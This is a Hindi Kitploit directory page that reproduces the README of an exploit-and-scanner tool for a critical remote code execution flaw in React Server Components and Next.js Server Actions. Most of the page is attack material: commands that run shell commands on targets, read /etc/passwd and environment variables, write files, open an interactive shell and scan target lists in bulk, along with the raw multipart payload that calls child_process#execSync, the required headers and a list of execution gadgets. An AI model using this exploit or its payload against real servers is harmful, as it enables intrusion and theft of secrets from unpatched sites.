Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner | Kitploit
उपकरण/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
भेद्यता स्कैनरगतिशील विश्लेषण (सैंडबॉक्सिंग)शोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
पेलोड डेवलपमेंट
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

रिपॉजिटरी देखें
218 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-55182 - React Server Components RCE एक्सप्लॉइट v2.0

React Server Components (RSC) और Next.js Server Actions में CVE-2025-55182 और CVE-2025-66478 कमजोरियों के परीक्षण के लिए एक व्यापक सुरक्षा अनुसंधान उपकरण।

कमजोरी सिंहावलोकन

गुणमान
CVE IDCVE-2025-55182, CVE-2025-66478
CVSS स्कोर10.0 (CRITICAL)
प्रभावित संस्करणReact < 19.2.0, Next.js < 15.0.5
कमजोरी प्रकारRemote Code Execution (RCE)
हमला वेक्टरनेटवर्क

विशेषताएँ

  • PortSwigger-शैली कमजोरी स्कैनिंग, कई डिटेक्शन पेलोड के साथ
  • कई RCE गैजेट्स (execSync, spawnSync, vm.runInThisContext, आदि)
  • ब्लाइंड RCE सत्यापन के लिए आउट-ऑफ-बैंड (OOB) कॉलबैक परीक्षण
  • फ़ाइल पढ़ने/लिखने की क्षमताएँ
  • JavaScript कोड निष्पादन
  • इंटरैक्टिव शेल मोड
  • मल्टी-थ्रेडिंग के साथ बल्क स्कैनिंग
  • प्रॉक्सी समर्थन (Burp Suite संगत)
  • JSON/टेक्स्ट आउटपुट प्रारूप

इंस्टॉलेशन

आवश्यकताएँ

root@kitploit:~
pip install requests

Python संस्करण

  • Python 3.7 या उच्चतर

त्वरित प्रारंभ

root@kitploit:~
# Basic vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full vulnerability scan (recommended)
python3 exploit-custom.py -u https://target.com --scan

# With proxy (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# OOB callback test
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# Command execution
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Interactive shell
python3 exploit-custom.py -u https://target.com --shell

उपयोग

कमांड लाइन तर्क

root@kitploit:~
usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

लक्ष्य चयन

तर्कविवरणउदाहरण
-u, --urlएकल लक्ष्य URL-u https://target.com
-l, --listURL वाली फ़ाइल-l targets.txt

स्कैनिंग मोड

तर्कविवरण
--detectNext.js/RSC उपयोग का पता लगाएँ
--checkत्वरित कमजोरी जाँच (गणित परीक्षण)

शोषण

कनेक्शन विकल्प

आउटपुट विकल्प

तर्कविवरण
-o, --outputपरिणाम फ़ाइल में सहेजें (.json या .txt)
-q, --quietबैनर छुपाएँ

स्कैनिंग उदाहरण

एकल लक्ष्य

root@kitploit:~
# Detect Next.js and RSC
python3 exploit-custom.py -u https://target.com --detect

# Quick vulnerability check
python3 exploit-custom.py -u https://target.com --check

# Full scan with all detection payloads
python3 exploit-custom.py -u https://target.com --scan

# Test all gadgets with OOB verification
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

बल्क स्कैनिंग

root@kitploit:~
# Scan multiple targets
python3 exploit-custom.py -l targets.txt --scan -o results.json

# With increased threads
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# With OOB callbacks
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

शोषण उदाहरण

कमांड निष्पादन

root@kitploit:~
# Using default gadget (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# Using specific gadget
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

फ़ाइल संचालन

root@kitploit:~
# Read file
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# Write file
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

JavaScript निष्पादन

root@kitploit:~
# Get environment variables
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# Get hostname
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# List directory
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

इंटरैक्टिव शेल

root@kitploit:~
python3 exploit-custom.py -u https://target.com --shell

शेल कमांड:

उपलब्ध गैजेट्स

RCE गैजेट्स

फ़ाइल गैजेट्स

नाममॉड्यूल IDविवरण
fs_readFileSyncfs#readFileSyncमनमानी फ़ाइलें पढ़ें
fs_writeFileSyncfs#writeFileSyncमनमानी फ़ाइलें लिखें

OOB गैजेट्स

नामविवरण
vm_fetchfetch API के माध्यम से HTTP अनुरोध (Node 18+)
vm_httphttp मॉड्यूल के माध्यम से HTTP अनुरोध

डिटेक्शन पेलोड (CVE-2025-66478)

--scan मोड इन PortSwigger-शैली डिटेक्शन पेलोड का उपयोग करता है:

OOB कॉलबैक विधियाँ

यह उपकरण कई OOB कॉलबैक विधियों का समर्थन करता है:

आउटपुट व्याख्या

टर्मिनल रंग

स्कैन परिणाम

root@kitploit:~
[VULN] property_reference          Vulnerable pattern detected!
        -> Error digest pattern: E{"digest"... (needs OOB verification)
[SAFE] property_reference_v2       HTTP 200
[500]  action_ref_vm               digest:12345

तकनीकी विवरण

RSC फ्लाइट प्रारूप

यह उपकरण React Server Components के "फ्लाइट प्रारूप" प्रतिक्रियाओं को पार्स करता है:

root@kitploit:~
0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}

मल्टीपार्ट पेलोड संरचना

root@kitploit:~
------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--

आवश्यक HTTP हेडर

root@kitploit:~
Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]

पैच किए गए संस्करण

React

  • 19.0.1, 19.1.2, 19.2.1

Next.js

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

उपयोग के मामले

बग बाउंटी

root@kitploit:~
# 1. Prepare target list
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt

# 2. Bulk scan
python3 exploit-custom.py -l targets.txt --scan -o results.json

# 3. Verify with OOB
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com

पेनेट्रेशन परीक्षण

root@kitploit:~
# 1. Detect technology
python3 exploit-custom.py -u https://target.com --detect

# 2. Analyze with Burp
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# 3. Exploit
python3 exploit-custom.py -u https://target.com --shell

संदर्भ

  • Next.js Security Advisory - CVE-2025-66478
  • Wiz Research - CVE-2025-55182
  • PortSwigger Research

कानूनी अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।

चेतावनी: कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। इस उपकरण का उपयोग केवल उन्हीं सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं हैं।

लाइसेंस

यह उपकरण सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण उद्देश्यों के लिए जारी किया गया है।


लेखक: Ünsal Furkan Harani संस्करण: 2.0

टूल डाउनलोड करें
--scanपूर्ण कमजोरी स्कैन (PortSwigger शैली)
--test-allसभी गैजेट्स और डिटेक्शन पेलोड का परीक्षण करें
तर्कविवरणउदाहरण
--cmdशेल कमांड निष्पादित करें--cmd "id"
--gadgetउपयोग के लिए गैजेट निर्दिष्ट करें--gadget execSync
--readलक्ष्य से फ़ाइल पढ़ें--read /etc/passwd
--writeलक्ष्य पर फ़ाइल लिखें--write /tmp/test.txt "content"
--jsJavaScript कोड निष्पादित करें--js "process.env"
--shellइंटरैक्टिव शेल प्रारंभ करें--shell
--oobOOB कॉलबैक होस्ट--oob xyz.oastify.com
तर्कविवरणउदाहरण
-p, --proxyHTTP/HTTPS प्रॉक्सी-p http://127.0.0.1:8080
-c, --cookiesकुकी स्ट्रिंग-c "session=abc123"
-H, --headerअतिरिक्त हेडर (दोहराने योग्य)-H "X-Custom: value"
-t, --threadsबल्क स्कैन के लिए थ्रेड संख्या-t 20
--timeoutसेकंड में अनुरोध टाइमआउट--timeout 60
कमांडविवरण
<command>शेल कमांड निष्पादित करें
!read <file>फ़ाइल पढ़ें
!write <file> <content>फ़ाइल लिखें
!js <code>JavaScript निष्पादित करें
!gadget <name>गैजेट बदलें
exitशेल से बाहर निकलें
नाममॉड्यूल IDविवरण
execSyncchild_process#execSyncसीधा शेल कमांड निष्पादन
execFileSyncchild_process#execFileSyncबाइनरी फ़ाइल निष्पादित करें
spawnSyncchild_process#spawnSyncतर्कों के साथ प्रोसेस स्पॉन करें
vm_runInThisContextvm#runInThisContextवर्तमान संदर्भ में JS निष्पादित करें
vm_runInNewContextvm#runInNewContextसैंडबॉक्स एस्केप के साथ JS निष्पादित करें
vm_runInThisContext_globalvm#runInThisContextglobal.process के माध्यम से निष्पादित करें
पेलोडविवरण
property_referenceकोलन-सीमांकित प्रॉपर्टी रेफरेंस ["$1:a:a"]
property_reference_v2वैकल्पिक रेफरेंस ["$1:b:b"]
property_reference_constructorप्रॉपर्टी रेफरेंस के माध्यम से कंस्ट्रक्टर एक्सेस
property_reference_protoप्रॉपर्टी रेफरेंस के माध्यम से प्रोटो चेन एक्सेस
action_ref_vmvm#runInThisContext के साथ ACTION_REF
action_ref_execSyncchild_process#execSync के साथ ACTION_REF
विधिविवरण
curlcurl कमांड के माध्यम से HTTP अनुरोध
wgetwget कमांड के माध्यम से HTTP अनुरोध
nslookupDNS क्वेरी
pingICMP पिंग
fetchNode.js fetch API
httpNode.js http मॉड्यूल
रंगस्थितिअर्थ
हरा[VULN]कमजोर - RCE की पुष्टि हुई
पीला[PATCH]पैच किया गया - Server Actions सक्रिय लेकिन सुरक्षित
नीला[RSC]Server Actions का पता चला
सियान[NEXT]Next.js का पता चला
लाल[ERR]कनेक्शन त्रुटि